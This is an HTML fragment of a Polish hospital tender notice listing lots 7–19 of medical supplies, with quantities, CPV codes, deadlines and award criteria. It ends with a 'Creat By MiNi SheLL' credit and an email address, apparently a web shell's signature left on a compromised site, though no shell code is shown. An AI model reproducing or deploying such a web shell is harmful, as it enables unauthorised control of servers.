<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła do pobierania leków z fiolek z gumowym korkiem  lub ampułki, tępa, uniemożliwiająca fragmentację korka podczas przekłuwania,. 18G 1,2x40mm a 100 sztuk		OP.	30
Bezpieczne igły iniekcyjne, z mechanizmem bezpieczeństwa zintegrowanym z igłą, umożliwiające aktywację jedną ręką, kolorystyczne rozróżnienie średnic igieł, kompatybilne z końcówkami Luer Slip i Luer Lock, zabezpieczenie podwójnym mechanizmem blokady. rozm. 0,5-1,2		OP.	100
Rurka krtaniowa LTS-D jednorazowa

Rurka krtaniowa z PCV dwukanałowa, z dodatkowym kanałem do odsysania treści przewodu pokarmowego przez cewnik CH16, pakowana sterylnie.
Przeznaczona jest do zabezpieczenia drożności dróg oddechowych.
Ich kształ i budowa ułatwia wprowadzenie do części krtaniowej gardła na ślepo, bez użycia laryngoskopu.
Dwa nadmuchiwane mankiety stabilizują rurkę, uszczelniają część ustną i nosową gardła oraz minimalizują ryzyko wduchnięcia powietrza do żołądka.
Rurka krtaniowa LTS-D jednorazowa silikonowaw rozmiarach: 3, 4, 5 - oznaczonych kolorystycznie, co znacznie ułatwia dobór odpowiedniego rozmiaru rurki.	SZTUK	15
Kaniule dożylne bezpieczne  wykonane z poliuretanu ,z zaworem  portu górnego, ze skrzydełkami,  z filtrem hydrofobowym, posiadające automatyczne zabezpieczenie końca igły w postaci zatrzasku aktywowanego po wyjęciu igły z cewnika. Rozmiary:od 14G do 24 G		SZTUK	1000
Wymiennik ciepła i wilgoci Altech do tracheostomii sterylny AL. 080259		SZTUK	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw opatrunkowy duży L, 1 opatrunek piankowy (gąbka)  25 x16x3cm , 2 folie samoprzylepne 34 x 32cm,1 kopuła ssąca (nasadka) z przewodem łączącym (drenu 2m)i klamrą, końcówka drenu w kształcie  koła, wykonany z silikonu, dwuświatłowy, drugi koniec złączka  integralnym z łącznikiem, 1 papierowa linijka.Kompatybilny z pompą -  model extriCare 2400.		zest.	25
Zbiorniki na wydzielinę 100 ml, zbiorniki z wbudowanym filtrem powietrza i filtrem węglowym i środkiem żelującym, mocowane do tylnej lub bocznej ściany urządzenia, redukcja dyskomfortu pacjenta mobilnego poruszającego się po oddziale z urządzeniem-(inni pacjenci nie widzą wydzieliny w zbiorniku zbiornik pomiędzy urządzeniem a pacjentem niewidoczny), zbiorniki kompatybilne z zestawami opatrunkowymi,   jednostką pracującą w trybie ciągłym lub przerywanym, zakres podcienienia 40-140mmHg lub 40-200mmHg. Kompatybilny z pompą -  model extriCare 2400.		zest.	10
Zbiorniki na wydzielinę 400ml zbiorniki z wbudowanym filtrem powietrza i filtrem węglowym i środkiem żelującym, mocowane do tylnej lub bocznej ściany urządzenia, redukcja dyskomfortu pacjenta mobilnego poruszającego się po oddziale z urządzeniem-(inni pacjenci nie widzą wydzieliny w zbiorniku zbiornik pomiędzy urządzeniem a pacjentem niewidoczny), zbiorniki kompatybilne z zestawami opatrunkowymi,   jednostką pracującą w trybie ciągłym lub przerywanym, zakres podcienienia 40-140mmHg lub 40-200mmHg. Kompatybilny z pompą -  model extriCare 2400.		zest.	10
Zestaw opatrunkowy mały M, 1 opatrunek piankowy (gąbka)  10 x7,5x3cm  , 1 folia samoprzylepna 34 x 32cm,1 kopuła ssąca (nasadka) z przewodem łączącym (drenu 2m)i klamrą, końcówka drenu w kształcie  koła, wykonany z silikonu, dwuświatłowy, drugi koniec złączka  integralnym z łącznikiem, 1 papierowa linijka. Kompatybilny z pompą -  model extriCare 2400.		zest.	30
Zbiorniki na wydzielinę 1000ml , zbiorniki z wbudowanym filtrem powietrza i filtrem węglowym i środkiem żelującym, mocowane do tylnej lub bocznej ściany urządzenia, redukcja dyskomfortu pacjenta mobilnego poruszającego się po oddziale z urządzeniem-(inni pacjenci nie widzą wydzieliny w zbiorniku zbiornik pomiędzy urządzeniem a pacjentem niewidoczny), zbiorniki kompatybilne z zestawami opatrunkowymi,   jednostką pracującą w trybie ciągłym lub przerywanym, zakres podcienienia 40-140mmHg lub 40-200mmHg. Kompatybilny z pompą -  model extriCare 2400.		sztuka	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przezroczysty opatrunek z PU  z wycięciem do cewników centralnych, ze wzmocnionym  włókniną od spodu obrzeżem z 4- stron, obrzeże z drobnymi poprzecznymi nacięciami, 8,5 x 11,5 cm, 2 szerokie min. 2,5-3,5 cm aplikatory, z ramką, laminowana metka do oznaczeń  i szeroki laminowany pasek i mocujący z mocnej rozciągliwej włókniny, szybka aplikacja w 2 krokach (papier zabezpieczający i ramka), klej akrylowy naniesiony w siateczkę (folia) i ze wzorem kropek (włóknina) w sposób gwaranttujący wysoką przepuszczalność dla pary wodnej, odporny na działanie środków dezynfekcyjnych zawierających alkohol, wyrób medyczny klasy IIa, opakowanie typu folia-folia. Potwierdzenie bariery folii dla wirusów =>27nm przez niezależne laboratorium na podstawie badań statystycznie znamiennej ilości probek (min 32). 		szt.	200
Bakteriobójczy  przylepny opatrunek z PU do cewników centralnych z hydrożelem zawierającym 2% glukonian chlorheksydyny o natychmiastowym działaniu po aplikacji. Przezroczysty, z wycięciem, ze wzmocnionym  włókniną od spodu obrzeżem, 8,5 x 11,5 cm, 2 szerokie min. 2,5-3,5 cm aplikatory, z ramką, metką i 2 paskami mocującymi, klej akrylowy naniesiony ze wzorem siateczki dla wysokiej przepuszczalności pary wodnej, wyrób medyczny klasy III,  opakowanie typu folia-folia. Potwierdzenie bariery folii dla wirusów =>27nm przez niezależne laboratorium na podstawie badań statystycznie znamiennej ilości probek (min 32). Potwierdzona klinicznie RBK redukcja zakażeń odcewnikowych.		szt.	100
Przylepiec chirurgiczny, hypoalergiczny, z mikroporowatej włókniny poliestrowej bez zawartości wiskozy i celulozy, z makroperforacją na całej powierzchni, umożliwiającą dzielenie bez nożyczek wzdłuż i w poprzek, z klejem akrylowym równomiernie naniesionym na całej powierzchni,  bez zawartości tlenku cynku, kauczuku i lateksu, wodoodporny, o wysokiej przylepności w momencie aplikacji i długoczasowej.9,1m x2,5 cm		szt.	300
Opatrunek włókninowy z warstwą chłonną 10x10 cm		szt.	2400
Opatrunek włókninowy z warstwą chłonną 10x15 cm		szt.	2400
Opatrunek włókninowy z warstwą chłonną 10x20 cm		szt.	2400
Opatrunek włókninowy z warstwą chłonną 10x25 cm		szt.	2400
Przezroczysty opatrunek z PU do  kaniul obwodowych, 6 x 7 cm z wycięciem, z ramką i  metka do oznaczenia, odporny na działanie środków dezynfekcyjnych zawierających alkohol, wyrób medyczny klasy IIa,  opakowanie  typu folia-folia.Potwierdzenie bariery folii dla wirusów =>27nm przez niezależne laboratorium na podstawie badań statystycznie znamiennej ilości probek (min 32).opakowanie a 100 szt		op.	20
Sterylny włókninowy opatrunek do zabezpieczania wkłuć obwodowych, posiadający luźną podkładkę, zaokrąglone brzegi o wymiarach 7,6cm * 5,1cm z tolerancją rozmiaru+/- 0,5cm  opakowanie a 50 sztuk		op.	200
Sterylny bezalkoholowy trójpolimerowy preparat z silikonem do ochrony skóry zdrowej i uszkodzonej, dodatek plastycyzera zapewnia niepękającą barierę na skórze. działanie ochronne przez 72 godziny, skuteczność ochrony skóry przed uszkodzeniem przez mocz/kał potwierdzona klinicznie na grupie minimum 900 pacjentów (załączyć wykaz publikacji badań klinicznych). 12x28ml		op.	5
Skoncentrowany trójpolimerowy krem z silikonem do ochrony skóry przed działaniem płynów oraz nietrzymaniem moczu/kału, zapewnia  nawilżanie suchej i spierzchniętej skóry, bez zawartości tlenku cynku i alkoholu, działanie przez 24 godziny (aplikacja co 3-4 epizod nietrzymania moczu/kału), skuteczność ochrony skóry potwierdzona klinicznie na grupie minimum 200 pacjentów (załączyć wykaz publikacji badań klinicznych). 12x92gr		op.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do pomiaru rzutu serca metodą termodylucji przezpłucnej kompatybilny z posiadaną przez Szpital platformą kliniczną EV 1000 firmy Edwards Lifesciences:
- czujnik do ciągłego pomiaru rzutu serca oraz ciągłego pomiaru ciśnienia krwi;
- kranik trójdrożny z dwoma zastawkami zwrotnymi zabezpieczającymi przed cofaniem się płynów;
- poliuretanowe wkłucie centralne 5F, dł. 20 cm (lub 4F, dł. 16 cm) 
- dwa niezależne gniazda sygnału ciśnienia
- połączenia gniazd sygnału ciśnienia - bezpinowe
- częstotliwość własna czujnika 200 Hz
- zestaw musi posiadać wyjście na monitor przyłóżkowy z sygnałem inwazyjnego ciśnienia SZT. 15
Czujnik do ciągłego pomiaru rzutu serca z dostępu tętniczego kompatybilny z posiadaną przez Szpital platformą klinczną EV 1000 firmy Edwards Lifesciences: 
- Długość linii 152 cm
- Dwa niezależne gniazda sygnału ciśnienia
- Połączenia gniazd sygnału ciśnienia-bezpinowe
- Czujnik pozwalający na inwazyjny pomiar ciśnienia krwi na zewnętrznym monitorze funkcji życiowych bez konieczności podłączania dodatkowych przetworników ciśnienia i linii pomiarowych SZT. 20
Czujnik do pomiaru ciśnienia metodą bezpośrednią - pojedynczy kompatybilny z kardiomonitorami GE Solar 8000M:
- długość linii płuczącej 150 cm
- biureta wyposażona w system zabezpieczający przed zapowietrzaniem (szpikulec w biurecie z trzema otworami)
jeden przetwornik do krwawego pomiaru ciśnienia o częstotliwości własnej samego przetwornika 200Hz
- błąd pomiaru przetwornika (nieliniowość i histereza) do 1,5%
- odpowiednie oznaczenie drenów- kolorystyczne oznakowanie linii i kraników
- system przepłukiwania uruchamiany wielokierunkowo przez pociągnięcie za niebieski wypustek
- połączenie przetwornika z kablem łączącym z monitorem, bezpinowe, chroniące przed zalaniem (wodoodporne) 
-linia nie powinna wymagać stosowania dodatkowych eliminatorów zakłóceń rezonansowych w warunkach OIT lub na bloku operacyjnym
-przetwornik zawiera osobny port do testowania poprawności działania systemu: linia z przetwornikiem: kabel sygnałowy monitor SZT. 40
Czujnik do pomiaru ciśnienia metodą bezpośrednią - podwójny kompatybilny z kardiomonitorami GE Solar 8000M:
-długość linii płuczącej 2 x 150 cm, linia żylna i tętnicza oznaczona kolorem na całej długości
-biureta wyposażona w system zabezpieczający przed zapowietrzaniem (szpikulec w biurecie z trzema otworami)
jeden przetwornik do krwawego pomiaru ciśnienia o częstotliwości własnej samego przetwornika 200Hz
-błąd pomiaru przetwornika (nieliniowość i histereza) do 1,5%
-odpowiednie oznaczenie drenów- kolorystyczne oznakowanie linii i kraników, 4 kraniki trójdrożne
-system przepłukiwania uruchamiany wielokierunkowo przez pociągnięcie za niebieski wypustek
-połączenie przetwornika z kablem łączącym z monitorem, bezpinowe, chroniące przed zalaniem (wodoodporne)                                                                         
-linia nie powinna wymagać stosowania dodatkowych eliminatorów zakłóceń rezonansowych w warunkach OIT lub na bloku operacyjnym
-przetwornik zawiera osobny port do testowania poprawności działania systemu: linia z przetwornikiem: kabel sygnałowy monitor SZT. 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cytoluer - przyrząd do nabierania płynu z worka, rozpuszczania i podawania leku do worka Viaflo Cytoluer  sztuk 4000
Chemo-Aide Dispensing Pin
z połączeniem bezigłowym
Clearlink - przyrząd z filtrem 0,2 do przygotowywania i podawania leków do chemioterapii z fiolek

Chemo-Aide  sztuk 400
Vialmate - przyrząd do rozpuszczania
jednorazowych dawek leków
w postaci suchej substancji z fiolek
sztuk 1000
Przyrząd do paklitakselu
z filtrem 0,22 
sztuk 250
Clearlink - łącznik dostępu dożylnego aktywowany końcówką typu Luer.

sztuk	500
Kapturek sztuk 1000
Clearlink - 2 łączniki dostępu
dożylnego aktywowane końcówką
typu Luer z przedłużeniem cewnika
naczyniowego typu Y; 12,7 cm
 sztuk 100
Spike do przygotowywania i pobierania leków z zaworem samozamykającym Clearlink z gładką powierzchnią do wielokrotnej dezynfekcji do zastosowania do 96 godzin sztuk 1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RTG FILM 31x41 150 sztuk		op.	4
RTG UTRWALACZ  RĘCZNY 		litr	20
RTG WYWOŁYWACZ  RĘCZNY 		litr	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie Nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Seton 17-nitkowy, 4-warstwowy, 2m x 1cm JAŁOWY 1 szt.  		SZT.	600
Seton 17-nitkowy, 4-warstwowy, 2m x 2cm JAŁOWY 1 szt.  		SZT.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie Nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RĘKAW PAP - FOL. PŁASKI  10 cm x 200 m		OP	20
RĘKAW PAP - FOL. PŁASKI  12 cm x  200 m		OP	15
RĘKAW PAP - FOL. PŁASKI  50 mm x 200 m		OP	10
RĘKAW PAP - FOL. PŁASKI  75 mm x 200 m		OP	20
RĘKAW PAP - FOL. PŁASKI 150 mm x 200 m		OP	20
RĘKAW PAP - FOL. PŁASKI 210 mm x 200 m		OP	10
RĘKAW PAP - FOL. PŁASKI 250 mm x 200 m		OP	20
RĘKAW PAP - FOL. PŁASKI 300 mm x 200 m		OP	15
RĘKAW PAP - FOL. PŁASKI 350 mm x 200 m		OP	10
RĘKAW PAP - FOL. PŁASKI 400 mm x 200 m		OP	5
RĘKAW PAP - FOL. Z FAŁDĄ  15 X 5 X 100 m		OP	10
RĘKAW PAP - FOL. Z FAŁDĄ  20 X 5 X 100m		OP	10
RĘKAW PAP - FOL. Z FAŁDĄ  25 x 6,5 x 100m		OP	5
RĘKAW PAP - FOL. Z FAŁDĄ  30x 6x 100 m		OP	5
RĘKAW PAP - FOL. Z FAŁDĄ  75 x 30 x 100m		OP	15
RĘKAW PAP - FOL. Z FAŁDĄ 100 X 40 X 100 m		OP	20
Jednorazowy pakiet Bovie - Dick.
Kontroluje penetrację i jakość pary, symulując ładunek porowaty Potwierdzenie zgodności z EN ISO 11140-4.	SZT	700
STER.ETYKIETA WSK.MINI JG 687a 100 szt.		OP	10
STER.FILTR DO KONTENERA  166 a 1000 szt.		OP	10
STER.GAZ DO STERYLIZACJI GS-2  		SZT	200
STER.PLOMBA WSAŻNIKOWA  JG 744 a 1000 szt		OP	5
STER.TAŚMA BEZ WSKAŻ. 19 mm x 50 m		OP	60
STER.TAŚMA ZE WSKAŹ. PARĄ WOD.19 mmx50 m		OP	60
STER.TEST. BIOLOG. ATTEST 1262 a 100 szt 		OP	10
Filtr do kontenera ze wskaźnikiem, średnica 19 cm, opkowa. 500 szt.		OP	10
STER.TEST DO KONTROLI STER.DO PARY -500sz		OP	15
STER.TEST PASKOW.STERY(A480)-COMPLY 1251		OP	10
STER.WSKAŹ. BIOLOG. DO TLEN.ETYL. 1264		OP	3
Integrator z przesuwalną substancją wskaźnikową, informacja o normie i klasie testu na każdym teście, klasa V, opakowanie 100 sztuk		OP	20
Teflonowy  filtr do kontenera,przeznaczony na 1200 cykli, średnica 190 mm		SZT	20
Etykiety dwukrotnie przylepne ze wskaźnikiem chemicznym do sterylizacji parą wodną z sześcioma miejscami informacyjnymi,  rolka  750 etykiet 		SZT	20
Metkownica alfanumeryczna trzyrzędowa typu GKE, 12 liter w jednym rzędzie		SZT	1
Testy sprawdzające skuteczność procesów mycia oraz efektywność działania detergentów w myjniach ultradźwiękowych. Substancja wskaźnikowa koloru niebieskiego, umieszczona na metalowej cienkiej płytce,  w komplecie holder do zamocowania testu. opakowanie 50 sztuk.		OP	16
STER.WSKAŹ. DO STER. PARĄ WOD.COMPLY 1250		OP	40
Zabezpieczenia do narzędzi osrtych szerokość do 25 mm, długość do 150mm 		op 	1
Totrebka  do narzędzi 270mm x 450 mm		op	1000
Totrebka  do narzędzi 210mmx 420 mm		SZT	1000
Torebka do narzędzi 420 mm x 450 mm 		op	1000
STER.TAŚMA WSKAŹ. (TLENEK ETYLENU)ITE-19		OP	10
STER.TEST-ROLKA TERMICZNA 1216A 3M 79m x 30 m		OP	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> zadanie Nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAPIER DO STER. KREPOWANY  75 x 75 NIEB.		OP	20
PAPIER DO STER. KREPOWANY  75 x 75 ZIEL.		OP	20
PAPIER DO STER. KREPOWANY  90 X 90 NIEB.		OP	20
PAPIER DO STER. KREPOWANY  90 X 90 ZIEL.		OP	20
PAPIER DO STER. KREPOWANY 130 X 150 NIEB.		OP	20
PAPIER DO STER. KREPOWANY 120 X 120 NIEB.		OP	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie Nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gąbka kolagenowa z antybiotykiem do zabiegów chirurgii septycznej i aseptycznej, charakteryzuje się  podwójną formą wysokiej, początkowej koncentracji gentamycyny dzięki siarczanowi gentamycyny i przedłużoną osłoną antybiotykową dzięki krobefatowi gentamycyny. TYPU  SEPTOCOLL E 20 (5x4cm)		szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> zadanie Nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MabTherma 500mg a 50ml			op	10
W przypadku leków onkologicznych preparaty o różnych dawkach umieszczone w tym samym zadaniu należy zaoferować od jednego producenta, aby w praktyce istniała możliwość łączenia.											
Oferowane produkty lecznicze muszą posiadać karty charakterystyki leku informujące o gęstości lub masie leku, które Wykonawca dostarczy Zamawiającemu na każde jego żądanie po podpisaniu umowy dostawy.											
Zamawiający wymaga aby leki onkologiczne i z programów miały wymagane kody EAN zgodnie z aktualnym Obwieszczenie Ministra Zdrowia w sprawie wykazu refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych. Brak spełnienia powyższego warunku skutkować będzie odrzuceniem oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie Nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy gazowe niejałowe 10x10cm-100szt. 8w 13nit podw. brzegi typu ES; kl IIa  reg. 7		OP	2600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie Nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Petle druciane do usuwanie migdałków średnica 0,3 mm pakowane po 100 sztuk 		OP	2
Petle druciane do usuwanie polipów  średnica 0,4 mm pakowane po 100 sztuk		OP	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com